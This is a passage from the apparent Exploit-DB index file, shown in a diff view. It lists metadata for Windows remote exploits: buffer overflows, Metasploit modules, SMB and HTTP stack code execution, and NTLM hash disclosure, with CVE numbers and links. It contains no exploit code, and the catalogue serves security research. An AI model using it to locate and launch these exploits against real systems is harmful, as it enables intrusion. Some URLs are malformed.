52334,exploits/windows/remote/52334.NA,"WebDAV Windows 10 - Remote Code Execution (RCE)",2025-06-15,"Dev Bui Hieu",remote,windows,,2025-06-15,2025-06-15,0,,,,,,
3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,
45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb
@ -45957,6 +45964,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
52330,exploits/windows/remote/52330.py,"Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)",2025-06-15,"Mohammed Idrees Banyamer",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-33073,,,,,
52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,

Can't render this file because it is too large.